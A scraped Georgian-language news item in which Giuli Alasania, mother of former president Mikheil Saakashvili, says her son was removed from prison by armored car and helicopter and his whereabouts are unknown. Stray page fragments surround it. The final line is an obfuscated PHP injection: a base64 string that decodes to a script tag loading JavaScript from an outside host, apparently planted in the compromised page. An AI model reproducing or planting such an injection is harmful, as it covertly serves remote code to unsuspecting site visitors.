celsiusi
ავერსი შნაიდერი
ყველაფრის იგნორირებით, ჩემი შვილი თვალწინ აგვართვეს და სადღაც გააქრეს, - ამის შესახებ საქართველოს მესამე პრეზიდენტის, მიხეილ სააკაშვილის დედამ, გიული ალასანიამ ჟურნალისტებს განუცხადა.
 
მისივე თქმით, მას მისი შვილის ადგილსამყოფელის შესახებ ინფორმაცია არ აქვს.
 
„ინფორმაცია მაქვს ის, რომ შეიკრიბა კონსილიუმი, რომლებმაც დაწერა, რომ უნდა გადაიყვანონ მრავალპროფილურ საავადმყოფოში. ამასობაში ყველაფრის იგნორიებით, თვალწინ აგვართვეს და სადღაც გააქრეს. გაიარა ორმა ბრონირებულმა მანქანამ და გადაგვიფრინა ვერტმფრენმა. 2 საათიდან ვიცდით და პასუხი არ გვაქვს, არაა ადამიანი, წაიყვანეს.
 
ფაქტია, რომ სულ ცოტა ხნის წინ გაიყვანეს ბრონირებული მანქანებით, მერე ვერტმფრენში ჩასვეს. სად წაიყვანეს არ ვიცი, ვნახოთ. არ აქვთ პასუხი იმ გოგონებს, ქვემოთ, რატომ არ გვიშვებენ. არ მაქვს ინფორმაცია, მაქვს მხოლოდ ვარაუდი და ის, რაც ჩემი თვალით დავინახე, როგორ გადაიფრინა ვერტმფრენმა და როგორ ჩაიარა ბრონირებულმა მანქანამ ფაქტია, რომ ჩემი შვილი აქ, ამ ციხეში, აღარაა,“ - განაცხადა ალასანიამ.
758
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");